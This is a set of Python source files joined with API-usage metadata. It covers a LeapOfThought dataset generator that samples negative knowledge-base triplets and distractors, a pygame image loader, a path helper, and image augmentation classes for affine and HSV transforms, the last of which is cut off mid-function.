if avoid_mixing is not None and 'hyponyms' in avoid_mixing:
subject_to_filter |= {e['subject'] for e in TeachAIKB().sample({'predicate': 'hypernym', 'object': curr_subject})}
if avoid_mixing is not None and 'co-hyponyms' in avoid_mixing:
subject_is_hyponym_of = {e['object'] for e in TeachAIKB().sample({'subject': curr_subject, 'predicate': 'hypernym'})}
subject_to_filter |= {e['subject'] for e in
TeachAIKB().sample({'predicate': 'hypernym', 'object': list(subject_is_hyponym_of)})}
if avoid_mixing is not None and 'co-meronyms' in avoid_mixing:
subject_is_meronym_of = {e['subject'] for e in TeachAIKB().sample({'predicate': 'meronym', 'object': curr_subject})}
subject_to_filter |= {e['object'] for e in
TeachAIKB().sample({'predicate': 'meronym', 'subject': list(subject_is_meronym_of)})}
subject_filter_lookup[curr_subject] = subject_to_filter
return subject_filter_lookup
#@profile
def self_negative_subject_sample(self, examples, sample_on = None, avoid_mixing=None, over_sample = 1.0):
examples = deepcopy(examples)
if sample_on is not None:
triplets_to_sample_on = [e[sample_on] for e in examples]
else:
triplets_to_sample_on = examples
subject_filter_lookup = self.create_subject_filter_lookup(examples, sample_on, avoid_mixing)
output = []
examples_to_gen_from = deepcopy(examples) + random.sample(deepcopy(examples),int((over_sample - 1) * len(examples)))
for i,example in tqdm(enumerate(examples_to_gen_from)):
# sometimes we just want a list of triplets, with no specific dictionary field called "sample_on" ...
if sample_on is not None:
curr_triplet = example[sample_on]
else:
curr_triplet = example
curr_subject = curr_triplet['subject']
if sample_on is not None:
new_edge = deepcopy(
random.sample([e for e in examples if e[sample_on]['subject'] not in subject_filter_lookup[curr_subject]], 1)[0])
new_edge[sample_on]['predicate'] = deepcopy(curr_triplet['predicate'])
new_edge[sample_on]['object'] = deepcopy(curr_triplet['object'])
new_edge[sample_on]['validity'] = 'never true'
else:
new_edge = deepcopy(
random.sample([e for e in triplets_to_sample_on if e['subject'] not in subject_filter_lookup[curr_subject]], 1)[0])
new_edge['predicate'] = deepcopy(curr_triplet['predicate'])
new_edge['object'] = deepcopy(curr_triplet['object'])
new_edge['validity'] = 'never true'
output.append(new_edge)
return output
def connect_negative_shuffle_subject(self, shuffle, shuffle_on, tar_tag, avoid_mixing=None):
logger.info(f'connect_negative_shuffle_subject {tar_tag}')
# We assume shuffle_on is only one field (usueally predicate or object)
# Finding "clusters" that may not be shuffled internally when producing negative examples
# (because the have downword monotone relations)
connect_to = deepcopy(shuffle)
triplets_to_shuffle_df = pd.DataFrame(([e[shuffle_on] for e in shuffle]))
field_to_shuffle_counts = triplets_to_shuffle_df['subject'].value_counts()
subjects_to_shuffle = set(triplets_to_shuffle_df['subject'])
remaining_inds_to_choose = set(triplets_to_shuffle_df.index)
for curr_subject, size in field_to_shuffle_counts.iteritems():
potential_target_inds = deepcopy(remaining_inds_to_choose)
tar_subjects = subjects_to_shuffle - {curr_subject}
tar_subjects -= {e['subject'] for e in TeachAIKB().sample({'predicate': 'hypernym', 'object': curr_subject})}
if avoid_mixing is not None and 'co-hyponyms' in avoid_mixing:
subject_is_hyponym_of = {e['object'] for e in TeachAIKB().sample({'subject': curr_subject, 'predicate': 'hypernym'})}
tar_subjects -= {e['subject'] for e in
TeachAIKB().sample({'predicate': 'hypernym', 'object': list(subject_is_hyponym_of)})}
if avoid_mixing is not None and 'co-meronyms' in avoid_mixing:
subject_is_meronym_of = {e['subject'] for e in self.sample({'predicate': 'meronym', 'object': curr_subject})}
tar_subjects -= {e['object'] for e in self.sample({'predicate': 'meronym', 'subject': list(subject_is_meronym_of)})}
potential_target_inds &= set(triplets_to_shuffle_df[triplets_to_shuffle_df['subject'].isin(tar_subjects)].index)
targets = [e for e in connect_to if e[shuffle_on]['subject'] == curr_subject]
selected_inds = []
for i in random.sample(potential_target_inds, len(potential_target_inds)):
new_edge = {'subject': curr_subject,
'predicate': triplets_to_shuffle_df.loc[i, 'predicate'],
'object': triplets_to_shuffle_df.loc[i, 'object']}
# checking if there is no triplet that is true with the same values:
matching_edges_in_kb = self.lookup(new_edge)
if len(matching_edges_in_kb) == 0:
targets[len(selected_inds)][tar_tag] = new_edge
targets[len(selected_inds)][tar_tag].update({'validity': 'never true'})
selected_inds.append(i)
if len(selected_inds) >= len(targets):
break
if len(selected_inds) < len(targets):
logger.debug(f'did not find enough for {curr_subject}: {len(selected_inds)} found, {len(targets)} required')
else:
logger.debug(f'{curr_subject}: {len(selected_inds)} found.')
remaining_inds_to_choose -= set(selected_inds)
return connect_to
def sample_distractors(self, examples, sample, tar_tag):
# building indexes:
for i, sample_props in enumerate(sample):
src_tag, src_fields, sample, exactly_sample_num, connect, balance_with_statement = sample_props
# creating general indexes
indexes = {}
for field in ['subject', 'predicate', 'object', 'validity']:
indexes[field] = {}
for i, r in enumerate(examples):
if r[src_tag][field] not in indexes[field]:
indexes[field][r[src_tag][field]] = {i}
else:
indexes[field][r[src_tag][field]] |= {i}
# Link the connection to existing tags.
for i, example in tqdm(enumerate(examples), desc=f'adding distractors for {sample_props}'):
cand_inds_signed = {}
# the index helps us get candidates fast from the df of candidate_edges
cand_inds = set(range(len(examples)))
for field in src_fields:
cand_inds &= indexes[field][example[src_tag][field]]
# making sure cand edges do not contain a duplicate of the currect example
same_as_example_inds = indexes['subject'][example[src_tag]['subject']] & \
indexes['predicate'][example[src_tag]['predicate']] & \
indexes['object'][example[src_tag]['object']]
cand_inds -= same_as_example_inds
cand_inds_signed = {'always true':set(), 'never true': set()}
for validity in ['always true', 'never true']:
if validity in indexes['validity']:
cand_inds_signed[validity] |= cand_inds & indexes['validity'][validity]
if exactly_sample_num:
num_to_sample = sample
else:
num_to_sample = random.sample(range(min(len(cand_inds_signed['always true']) + \
len(cand_inds_signed['never true']), sample) + 1), 1)[0]
# Here we choose what is the validity value of the distractor we want to sample
if balance_with_statement is not None:
# balance_with_statement is not None, that means we care about the validity value balancing.
validities_to_sample = {'always true': math.ceil(num_to_sample / 2), 'never true': math.ceil(num_to_sample / 2)}
if balance_with_statement and validities_to_sample[example[src_tag]['validity']] > 0:
validities_to_sample[example[src_tag]['validity']] -= 1
else:
# Here we just randomly sample from a certain validity value (balance_with_statement is None, so it doesn't matter to us)
validities_to_sample = {'always true': 0, 'never true': 0}
validity_value_to_sample = random.sample(['always true', 'never true'],1)[0]
validities_to_sample[validity_value_to_sample] = num_to_sample
balanced_cand_inds = []
for validity, num_to_sample in validities_to_sample.items():
if len(cand_inds_signed[validity]) >= num_to_sample:
balanced_cand_inds += random.sample(cand_inds_signed[validity], num_to_sample)
# now actually sampling the rule we want to add to distractors
if tar_tag not in example:
example[tar_tag] = {}
for ind in balanced_cand_inds:
for tag in connect:
if tag not in example[tar_tag]:
example[tar_tag][tag] = []
example[tar_tag][tag].append(examples[ind][tag])
return examples
def print_stats(self):
for part in ['statement', 'implicit_rule', 'property']:
entities = {'dev': [], 'train': []}
for e in self.examples_meta:
if part in e:
if e['split'] == 'dev':
entities['dev'] += [e[part]['subject'], e[part]['object']]
elif e['split'] == 'train':
entities['train'] += [e[part]['subject'], e[part]['object']]
if len(entities['dev']) == 0 | len(entities['train']) == 0:
logger.info(f" {part} was not found or ablated.")
continue
entities_intersection_ratio = len(set(entities['dev']) & set(entities['train'])) / \
len(set(entities['dev']) | set(entities['train']))
logger.info(f"Dev/Train entity intersection in {part} :\n{entities_intersection_ratio}\n")
if entities_intersection_ratio > 0.01:
entity_stats = pd.DataFrame(
{'dev': pd.Series(entities['dev']).value_counts(), 'train': pd.Series(entities['train']).value_counts()}).dropna()
entity_stats['min'] = entity_stats[['dev', 'train']].min(axis=1)
logger.info(f"mutual entities stats:\n{entity_stats.sort_values(by='min')}")
if 'statement' in self.examples_meta[0]:
agg = pandas_multi_column_agg(pd.DataFrame([{'predicate': e['statement']['predicate'],'split':e['split'], 'z': 1} \
for e in self.examples_meta]), ['split', 'predicate'])
logger.info(f"Predicate count per split:\n{agg}\n")
examples_meta_df = pd.DataFrame(self.examples_meta)
logger.info(f"Positive vs Negative:\n{pandas_multi_column_agg(examples_meta_df, ['split', 'answer'])}\n")
| [
"logging.getLogger",
"copy.deepcopy",
"numpy.random.RandomState",
"pandas.set_option",
"numpy.random.seed",
"pandas.DataFrame",
"random.sample",
"hashlib.md5",
"random.shuffle",
"LeapOfThought.common.data_utils.pandas_multi_column_agg",
"os.path.abspath",
"logging.basicConfig",
"pandas.Serie... | [((413, 451), 'pandas.set_option', 'pd.set_option', (['"""display.max_rows"""', '(500)'], {}), "('display.max_rows', 500)\n", (426, 451), True, 'import pandas as pd\n'), ((452, 493), 'pandas.set_option', 'pd.set_option', (['"""display.max_columns"""', '(500)'], {}), "('display.max_columns', 500)\n", (465, 493), True, 'import pandas as pd\n'), ((494, 530), 'pandas.set_option', 'pd.set_option', (['"""display.width"""', '(2000)'], {}), "('display.width', 2000)\n", (507, 530), True, 'import pandas as pd\n'), ((531, 573), 'pandas.set_option', 'pd.set_option', (['"""display.max_colwidth"""', '(200)'], {}), "('display.max_colwidth', 200)\n", (544, 573), True, 'import pandas as pd\n'), ((574, 624), 'pandas.set_option', 'pd.set_option', (['"""display.colheader_justify"""', '"""left"""'], {}), "('display.colheader_justify', 'left')\n", (587, 624), True, 'import pandas as pd\n'), ((747, 854), 'logging.basicConfig', 'logging.basicConfig', ([], {'format': '"""%(asctime)s - %(levelname)s - %(name)s - %(message)s"""', 'level': 'logging.INFO'}), "(format=\n '%(asctime)s - %(levelname)s - %(name)s - %(message)s', level=logging.INFO)\n", (766, 854), False, 'import logging\n'), ((879, 906), 'logging.getLogger', 'logging.getLogger', (['__name__'], {}), '(__name__)\n', (896, 906), False, 'import logging\n'), ((997, 1012), 'random.seed', 'random.seed', (['(17)'], {}), '(17)\n', (1008, 1012), False, 'import random\n'), ((1021, 1041), 'numpy.random.seed', 'np.random.seed', (['(1234)'], {}), '(1234)\n', (1035, 1041), True, 'import numpy as np\n'), ((1066, 1091), 'numpy.random.RandomState', 'np.random.RandomState', (['(17)'], {}), '(17)\n', (1087, 1091), True, 'import numpy as np\n'), ((3095, 3108), 'hashlib.md5', 'hashlib.md5', ([], {}), '()\n', (3106, 3108), False, 'import hashlib\n'), ((3965, 3980), 'random.seed', 'random.seed', (['(17)'], {}), '(17)\n', (3976, 3980), False, 'import random\n'), ((3989, 4009), 'random.shuffle', 'random.shuffle', (['inds'], {}), '(inds)\n', (4003, 4009), False, 'import random\n'), ((6299, 6325), 'random.shuffle', 'random.shuffle', (['train_inds'], {}), '(train_inds)\n', (6313, 6325), False, 'import random\n'), ((10455, 10470), 'random.seed', 'random.seed', (['(17)'], {}), '(17)\n', (10466, 10470), False, 'import random\n'), ((10479, 10499), 'random.shuffle', 'random.shuffle', (['inds'], {}), '(inds)\n', (10493, 10499), False, 'import random\n'), ((12964, 12979), 'random.seed', 'random.seed', (['(17)'], {}), '(17)\n', (12975, 12979), False, 'import random\n'), ((13972, 13987), 'random.seed', 'random.seed', (['(17)'], {}), '(17)\n', (13983, 13987), False, 'import random\n'), ((18091, 18105), 'random.seed', 'random.seed', (['(7)'], {}), '(7)\n', (18102, 18105), False, 'import random\n'), ((20217, 20252), 'pandas.DataFrame', 'pd.DataFrame', (['triplets_to_sample_on'], {}), '(triplets_to_sample_on)\n', (20229, 20252), True, 'import pandas as pd\n'), ((21874, 21892), 'copy.deepcopy', 'deepcopy', (['examples'], {}), '(examples)\n', (21882, 21892), False, 'from copy import deepcopy\n'), ((23986, 24003), 'copy.deepcopy', 'deepcopy', (['shuffle'], {}), '(shuffle)\n', (23994, 24003), False, 'from copy import deepcopy\n'), ((24037, 24083), 'pandas.DataFrame', 'pd.DataFrame', (['[e[shuffle_on] for e in shuffle]'], {}), '([e[shuffle_on] for e in shuffle])\n', (24049, 24083), True, 'import pandas as pd\n'), ((32403, 32435), 'pandas.DataFrame', 'pd.DataFrame', (['self.examples_meta'], {}), '(self.examples_meta)\n', (32415, 32435), True, 'import pandas as pd\n'), ((4070, 4123), 'random.sample', 'random.sample', (['inds', "self._config['test_dev_size'][0]"], {}), "(inds, self._config['test_dev_size'][0])\n", (4083, 4123), False, 'import random\n'), ((4199, 4252), 'random.sample', 'random.sample', (['inds', "self._config['test_dev_size'][1]"], {}), "(inds, self._config['test_dev_size'][1])\n", (4212, 4252), False, 'import random\n'), ((5367, 5420), 'random.sample', 'random.sample', (['inds', "self._config['test_dev_size'][0]"], {}), "(inds, self._config['test_dev_size'][0])\n", (5380, 5420), False, 'import random\n'), ((5496, 5549), 'random.sample', 'random.sample', (['inds', "self._config['test_dev_size'][1]"], {}), "(inds, self._config['test_dev_size'][1])\n", (5509, 5549), False, 'import random\n'), ((9419, 9434), 'random.seed', 'random.seed', (['(17)'], {}), '(17)\n', (9430, 9434), False, 'import random\n'), ((12013, 12026), 'hashlib.md5', 'hashlib.md5', ([], {}), '()\n', (12024, 12026), False, 'import hashlib\n'), ((17416, 17445), 'random.shuffle', 'random.shuffle', (['context_rules'], {}), '(context_rules)\n', (17430, 17445), False, 'import random\n'), ((22208, 22226), 'copy.deepcopy', 'deepcopy', (['examples'], {}), '(examples)\n', (22216, 22226), False, 'from copy import deepcopy\n'), ((24415, 24449), 'copy.deepcopy', 'deepcopy', (['remaining_inds_to_choose'], {}), '(remaining_inds_to_choose)\n', (24423, 24449), False, 'from copy import deepcopy\n'), ((1225, 1237), 'json.load', 'json.load', (['f'], {}), '(f)\n', (1234, 1237), False, 'import _jsonnet, json\n'), ((8230, 8245), 'random.seed', 'random.seed', (['(17)'], {}), '(17)\n', (8241, 8245), False, 'import random\n'), ((8258, 8284), 'random.shuffle', 'random.shuffle', (['train_inds'], {}), '(train_inds)\n', (8272, 8284), False, 'import random\n'), ((8667, 8682), 'random.seed', 'random.seed', (['(17)'], {}), '(17)\n', (8678, 8682), False, 'import random\n'), ((8695, 8715), 'random.shuffle', 'random.shuffle', (['inds'], {}), '(inds)\n', (8709, 8715), False, 'import random\n'), ((9053, 9089), 'LeapOfThought.common.file_utils.is_path_creatable', 'is_path_creatable', (['self._output_file'], {}), '(self._output_file)\n', (9070, 9089), False, 'from LeapOfThought.common.file_utils import upload_jsonl_to_s3, save_jsonl_to_local, is_path_creatable\n'), ((9516, 9553), 'random.sample', 'random.sample', (['self.artiset_data', '(100)'], {}), '(self.artiset_data, 100)\n', (9529, 9553), False, 'import random\n'), ((10607, 10643), 'LeapOfThought.common.file_utils.is_path_creatable', 'is_path_creatable', (['self._output_file'], {}), '(self._output_file)\n', (10624, 10643), False, 'from LeapOfThought.common.file_utils import upload_jsonl_to_s3, save_jsonl_to_local, is_path_creatable\n'), ((11108, 11138), 'LeapOfThought.common.file_utils.is_path_creatable', 'is_path_creatable', (['output_file'], {}), '(output_file)\n', (11125, 11138), False, 'from LeapOfThought.common.file_utils import upload_jsonl_to_s3, save_jsonl_to_local, is_path_creatable\n'), ((16643, 16675), 'copy.deepcopy', 'deepcopy', (['example[statement_tag]'], {}), '(example[statement_tag])\n', (16651, 16675), False, 'from copy import deepcopy\n'), ((18025, 18042), 'copy.deepcopy', 'deepcopy', (['example'], {}), '(example)\n', (18033, 18042), False, 'from copy import deepcopy\n'), ((22243, 22261), 'copy.deepcopy', 'deepcopy', (['examples'], {}), '(examples)\n', (22251, 22261), False, 'from copy import deepcopy\n'), ((22937, 22972), 'copy.deepcopy', 'deepcopy', (["curr_triplet['predicate']"], {}), "(curr_triplet['predicate'])\n", (22945, 22972), False, 'from copy import deepcopy\n'), ((23021, 23053), 'copy.deepcopy', 'deepcopy', (["curr_triplet['object']"], {}), "(curr_triplet['object'])\n", (23029, 23053), False, 'from copy import deepcopy\n'), ((23348, 23383), 'copy.deepcopy', 'deepcopy', (["curr_triplet['predicate']"], {}), "(curr_triplet['predicate'])\n", (23356, 23383), False, 'from copy import deepcopy\n'), ((23421, 23453), 'copy.deepcopy', 'deepcopy', (["curr_triplet['object']"], {}), "(curr_triplet['object'])\n", (23429, 23453), False, 'from copy import deepcopy\n'), ((32118, 32238), 'pandas.DataFrame', 'pd.DataFrame', (["[{'predicate': e['statement']['predicate'], 'split': e['split'], 'z': 1} for\n e in self.examples_meta]"], {}), "([{'predicate': e['statement']['predicate'], 'split': e['split'\n ], 'z': 1} for e in self.examples_meta])\n", (32130, 32238), True, 'import pandas as pd\n'), ((16047, 16062), 'random.random', 'random.random', ([], {}), '()\n', (16060, 16062), False, 'import random\n'), ((16720, 16824), 'random.sample', 'random.sample', (["['foo', 'blah', 'ya', 'qux', 'aranglopa', 'foltopia', 'cakophon', 'baz',\n 'garply']", '(1)'], {}), "(['foo', 'blah', 'ya', 'qux', 'aranglopa', 'foltopia',\n 'cakophon', 'baz', 'garply'], 1)\n", (16733, 16824), False, 'import random\n'), ((32482, 32544), 'LeapOfThought.common.data_utils.pandas_multi_column_agg', 'pandas_multi_column_agg', (['examples_meta_df', "['split', 'answer']"], {}), "(examples_meta_df, ['split', 'answer'])\n", (32505, 32544), False, 'from LeapOfThought.common.data_utils import uniform_sample_by_column, pandas_multi_column_agg\n'), ((1140, 1165), 'os.path.abspath', 'os.path.abspath', (['__file__'], {}), '(__file__)\n', (1155, 1165), False, 'import os\n'), ((13671, 13686), 'random.random', 'random.random', ([], {}), '()\n', (13684, 13686), False, 'import random\n'), ((16264, 16275), 'LeapOfThought.resources.teachai_kb.TeachAIKB', 'TeachAIKB', ([], {}), '()\n', (16273, 16275), False, 'from LeapOfThought.resources.teachai_kb import TeachAIKB\n'), ((16841, 16852), 'LeapOfThought.resources.teachai_kb.TeachAIKB', 'TeachAIKB', ([], {}), '()\n', (16850, 16852), False, 'from LeapOfThought.resources.teachai_kb import TeachAIKB\n'), ((22772, 22885), 'random.sample', 'random.sample', (["[e for e in examples if e[sample_on]['subject'] not in\n subject_filter_lookup[curr_subject]]", '(1)'], {}), "([e for e in examples if e[sample_on]['subject'] not in\n subject_filter_lookup[curr_subject]], 1)\n", (22785, 22885), False, 'import random\n'), ((23192, 23307), 'random.sample', 'random.sample', (["[e for e in triplets_to_sample_on if e['subject'] not in\n subject_filter_lookup[curr_subject]]", '(1)'], {}), "([e for e in triplets_to_sample_on if e['subject'] not in\n subject_filter_lookup[curr_subject]], 1)\n", (23205, 23307), False, 'import random\n'), ((29254, 29282), 'math.ceil', 'math.ceil', (['(num_to_sample / 2)'], {}), '(num_to_sample / 2)\n', (29263, 29282), False, 'import math\n'), ((29298, 29326), 'math.ceil', 'math.ceil', (['(num_to_sample / 2)'], {}), '(num_to_sample / 2)\n', (29307, 29326), False, 'import math\n'), ((29804, 29851), 'random.sample', 'random.sample', (["['always true', 'never true']", '(1)'], {}), "(['always true', 'never true'], 1)\n", (29817, 29851), False, 'import random\n'), ((30175, 30231), 'random.sample', 'random.sample', (['cand_inds_signed[validity]', 'num_to_sample'], {}), '(cand_inds_signed[validity], num_to_sample)\n', (30188, 30231), False, 'import random\n'), ((24565, 24576), 'LeapOfThought.resources.teachai_kb.TeachAIKB', 'TeachAIKB', ([], {}), '()\n', (24574, 24576), False, 'from LeapOfThought.resources.teachai_kb import TeachAIKB\n'), ((20767, 20778), 'LeapOfThought.resources.teachai_kb.TeachAIKB', 'TeachAIKB', ([], {}), '()\n', (20776, 20778), False, 'from LeapOfThought.resources.teachai_kb import TeachAIKB\n'), ((20976, 20987), 'LeapOfThought.resources.teachai_kb.TeachAIKB', 'TeachAIKB', ([], {}), '()\n', (20985, 20987), False, 'from LeapOfThought.resources.teachai_kb import TeachAIKB\n'), ((21146, 21157), 'LeapOfThought.resources.teachai_kb.TeachAIKB', 'TeachAIKB', ([], {}), '()\n', (21155, 21157), False, 'from LeapOfThought.resources.teachai_kb import TeachAIKB\n'), ((21371, 21382), 'LeapOfThought.resources.teachai_kb.TeachAIKB', 'TeachAIKB', ([], {}), '()\n', (21380, 21382), False, 'from LeapOfThought.resources.teachai_kb import TeachAIKB\n'), ((21538, 21549), 'LeapOfThought.resources.teachai_kb.TeachAIKB', 'TeachAIKB', ([], {}), '()\n', (21547, 21549), False, 'from LeapOfThought.resources.teachai_kb import TeachAIKB\n'), ((24774, 24785), 'LeapOfThought.resources.teachai_kb.TeachAIKB', 'TeachAIKB', ([], {}), '()\n', (24783, 24785), False, 'from LeapOfThought.resources.teachai_kb import TeachAIKB\n'), ((24939, 24950), 'LeapOfThought.resources.teachai_kb.TeachAIKB', 'TeachAIKB', ([], {}), '()\n', (24948, 24950), False, 'from LeapOfThought.resources.teachai_kb import TeachAIKB\n'), ((14478, 14489), 'LeapOfThought.resources.teachai_kb.TeachAIKB', 'TeachAIKB', ([], {}), '()\n', (14487, 14489), False, 'from LeapOfThought.resources.teachai_kb import TeachAIKB\n'), ((31745, 31771), 'pandas.Series', 'pd.Series', (["entities['dev']"], {}), "(entities['dev'])\n", (31754, 31771), True, 'import pandas as pd\n'), ((31797, 31825), 'pandas.Series', 'pd.Series', (["entities['train']"], {}), "(entities['train'])\n", (31806, 31825), True, 'import pandas as pd\n'), ((15369, 15380), 'LeapOfThought.resources.teachai_kb.TeachAIKB', 'TeachAIKB', ([], {}), '()\n', (15378, 15380), False, 'from LeapOfThought.resources.teachai_kb import TeachAIKB\n')] |
import os
import pygame
from pygame.locals import *
from pygame.compat import geterror
from globals import DELTAX, DELTAY
main_dir = os.path.split(os.path.abspath(__file__))[0]
data_dir = os.path.join(main_dir, 'data')
def load_image(name, colorkey=None):
fullname = os.path.join(data_dir, name)
try:
image = pygame.image.load(fullname)
except pygame.error:
print('Cannot load image:', fullname)
raise SystemExit(str(geterror()))
image = image.convert()
if colorkey is not None:
if colorkey is -1:
colorkey = image.get_at((0, 0))
image.set_colorkey(colorkey, RLEACCEL)
return image, image.get_rect()
class Imageloader():
def __init__(self):
tilenames = ['blocks/ore'+str(i)+'.png' for i in range(1, 15)] + \
['blocks/rock'+str(i)+'.png' for i in range(1, 19)]
exanames = ['exa'+str(i)+'.png' for i in range(1, 10)]
firenames = ['fire'+str(i)+'.png' for i in range(1, 5)]
heronames = ['hero'+str(i)+'.png' for i in range(1, 8)]
lumina = ['lumina.png']
self.blocks_loaded = [load_image(i) for i in tilenames]
self.anim_loaded = [load_image(i, -1) for i in exanames]
self.fire_loaded = [load_image(i, -1) for i in firenames]
self.hero_loaded = [load_image(i, -1) for i in heronames]
self.lumina_loaded = [load_image('lumina.png', -1)]
| [
"os.path.abspath",
"pygame.image.load",
"os.path.join",
"pygame.compat.geterror"
] | [((192, 222), 'os.path.join', 'os.path.join', (['main_dir', '"""data"""'], {}), "(main_dir, 'data')\n", (204, 222), False, 'import os\n'), ((276, 304), 'os.path.join', 'os.path.join', (['data_dir', 'name'], {}), '(data_dir, name)\n', (288, 304), False, 'import os\n'), ((151, 176), 'os.path.abspath', 'os.path.abspath', (['__file__'], {}), '(__file__)\n', (166, 176), False, 'import os\n'), ((330, 357), 'pygame.image.load', 'pygame.image.load', (['fullname'], {}), '(fullname)\n', (347, 357), False, 'import pygame\n'), ((458, 468), 'pygame.compat.geterror', 'geterror', ([], {}), '()\n', (466, 468), False, 'from pygame.compat import geterror\n')] |
#!/usr/bin/env python3
import os
def split_path(path):
parts = path.split('/')
if len(parts) > 0:
if parts[-1] == '':
parts.pop(-1)
return parts
def mkdirs(*parts):
path = os.path.join(*parts)
from .io import mkdirs
mkdirs(path)
return path
| [
"os.path.join"
] | [((211, 231), 'os.path.join', 'os.path.join', (['*parts'], {}), '(*parts)\n', (223, 231), False, 'import os\n')] |
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
# This file is covered by the LICENSE file in the root of this project.
from __future__ import annotations
import typing
import cv2
import numpy as np
class PiRandomTransform:
"""A transformation that can act on raster and sparse two-dimensional data."""
def resample(self, random: np.random.RandomState):
raise NotImplementedError(f"{type(self)}.resample is not yet implemented.")
def transform_raster(
self, raster: np.ndarray, interpolation: str, fill_value: int
) -> np.ndarray:
"""
Args:
interpolation: One of "nearest", "linear", "cubic", "area".
"""
raise NotImplementedError(
f"{type(self)}.transform_raster is not yet implemented."
)
def transform_points(self, points: np.ndarray) -> np.ndarray:
"""
Args:
points: Shape (N, 2,). Order x, y.
"""
raise NotImplementedError(
f"{type(self)}.transform_points is not yet implemented."
)
class PiRandomAffineTransform(PiRandomTransform):
def __init__(
self,
input_width: int,
input_height: int,
output_width: int,
output_height: int,
flip_x_probability: float,
flip_y_probability: float,
rotation_max: float,
rotation_min: float,
scaling_x_max: float,
scaling_x_min: float,
scaling_y_max: float,
scaling_y_min: float,
shearing_x_max: float,
shearing_x_min: float,
shearing_y_max: float,
shearing_y_min: float,
translation_x_max: float,
translation_x_min: float,
translation_y_max: float,
translation_y_min: float,
probability: float,
**kwargs,
):
super().__init__()
self._input_width = input_width
self._input_height = input_height
self._output_width = output_width
self._output_height = output_height
self._flip_x_probability = flip_x_probability
self._flip_y_probability = flip_y_probability
self._rotation_min = rotation_min
self._rotation_max = rotation_max
self._scaling_x_min = scaling_x_min
self._scaling_x_max = scaling_x_max
self._scaling_y_min = scaling_y_min
self._scaling_y_max = scaling_y_max
self._shearing_x_min = shearing_x_min
self._shearing_x_max = shearing_x_max
self._shearing_y_min = shearing_y_min
self._shearing_y_max = shearing_y_max
self._translate_x_min = translation_x_min
self._translate_x_max = translation_x_max
self._translate_y_min = translation_y_min
self._translate_y_max = translation_y_max
self._probability = probability
self._flip_x = None
self._flip_y = None
self._rotation = None
self._scaling_x = None
self._scaling_y = None
self._shearing_x = None
self._shearing_y = None
self._translate_x = None
self._translate_y = None
self._matrix = None
self._apply = None
def resample(self, random: np.random.RandomState):
self._apply = random.choice(
[True, False], p=[self._probability, 1.0 - self._probability]
)
if not self._apply:
self._flip_x = None
self._flip_y = None
self._rotation = None
self._scaling_x = None
self._scaling_y = None
self._shearing_x = None
self._shearing_y = None
self._translate_x = None
self._translate_y = None
self._matrix = None
return
self._flip_x = random.choice(
[True, False],
p=[self._flip_x_probability, 1.0 - self._flip_x_probability],
replace=False,
)
self._flip_y = random.choice(
[True, False],
p=[self._flip_y_probability, 1.0 - self._flip_y_probability],
replace=False,
)
self._rotation = random.uniform(self._rotation_min, self._rotation_max)
self._scaling_x = random.uniform(self._scaling_x_min, self._scaling_x_max)
self._scaling_y = random.uniform(self._scaling_y_min, self._scaling_y_max)
self._shearing_x = random.uniform(self._shearing_x_min, self._shearing_x_max)
self._shearing_y = random.uniform(self._shearing_y_min, self._shearing_y_max)
self._translate_x = random.uniform(self._translate_x_min, self._translate_x_max)
self._translate_y = random.uniform(self._translate_y_min, self._translate_y_max)
# contruct transformation matrix
translation_1 = np.eye(3, dtype=np.float)
translation_1[0, 2] = -0.5 * self._input_width
translation_1[1, 2] = -0.5 * self._input_height
scaling = np.eye(3, dtype=np.float)
scaling[0, 0] = self._scaling_x
scaling[1, 1] = self._scaling_y
scaling[0, 1] = self._shearing_x
scaling[1, 0] = self._shearing_y
scaling[2, 2] = 1.0
rotation = np.eye(3, dtype=np.float)
rotation[0, 0] = np.cos(self._rotation)
rotation[1, 1] = np.cos(self._rotation)
rotation[0, 1] = -np.sin(self._rotation)
rotation[1, 0] = np.sin(self._rotation)
rotation[2, 2] = 1.0
translation_2 = np.eye(3, dtype=np.float)
translation_2[0, 2] = self._translate_x
translation_2[1, 2] = self._translate_y
translation_3 = np.eye(3, dtype=np.float)
translation_3[0, 2] = 0.5 * self._output_width
translation_3[1, 2] = 0.5 * self._output_height
self._matrix = (
translation_3 @ translation_2 @ rotation @ scaling @ translation_1
)
def transform_raster(
self,
raster: np.ndarray,
interpolation: str,
fill_value: typing.Union[int, float, np.ndarray],
):
if not self._apply:
return raster
interpolation_flag = {
"nearest": cv2.INTER_NEAREST,
"linear": cv2.INTER_LINEAR,
"cubic": cv2.INTER_CUBIC,
"area": cv2.INTER_AREA,
}[interpolation]
channels = 1 if len(raster.shape) == 2 else raster.shape[2]
if channels not in [1, 3]:
# apply on each channel separately
return np.stack(
[
self.transform_raster(
raster=raster[..., channel],
interpolation=interpolation,
fill_value=fill_value[channel]
if isinstance(fill_value, np.ndarray)
else fill_value,
)
for channel in range(channels)
],
axis=-1,
)
if isinstance(fill_value, np.ndarray) and fill_value.size == 1:
fill_value = fill_value.item()
elif isinstance(fill_value, np.ndarray):
fill_value = tuple(value.item() for value in fill_value)
return cv2.warpAffine(
src=raster,
M=self._matrix[:2, :],
dsize=(self._output_width, self._output_height),
flags=interpolation_flag,
borderMode=cv2.BORDER_CONSTANT,
borderValue=fill_value,
)
def transform_points(self, points: np.ndarray) -> np.ndarray:
if not self._apply:
return points
num_points = points.shape[0]
# using homogeneous coordinates
points = np.stack(
[points[:, 0], points[:, 1], np.ones((num_points,), dtype=np.float)],
axis=-1,
)
return ((self._matrix @ points.T).T)[:, :2]
class PiRandomHsvTransform(PiRandomTransform):
def __init__(
self,
hue_min: float,
hue_max: float,
saturation_min: float,
saturation_max: float,
value_min: float,
value_max: float,
probability: float,
channels: typing.List[int],
**kwargs,
):
super().__init__()
if len(channels) != 3:
raise ValueError("Three channel indices expected.")
self._hue_min = hue_min
self._hue_max = hue_max
self._saturation_min = saturation_min
self._saturation_max = saturation_max
self._value_min = value_min
self._value_max = value_max
self._probability = probability
self._channels = channels
self._hue = None
self._saturation = None
self._value = None
self._apply = None
def resample(self, random: np.random.RandomState):
self._apply = random.choice(
[True, False], p=[self._probability, 1.0 - self._probability]
)
if not self._apply:
self._hue = None
self._saturation = None
self._value = None
return
self._hue = random.uniform(low=self._hue_min, high=self._hue_max)
self._saturation = random.uniform(
low=self._saturation_min, high=self._saturation_max
)
self._value = random.uniform(low=self._value_min, high=self._value_max)
def transform_raster(
self, raster: np.ndarray, interpolation: str, fill_value: np.ndarray
) -> np.ndarray:
if not self._apply:
return raster
rgb = raster[..., self._channels]
# debug output
# cv2.imshow("input", rgb[..., ::-1])
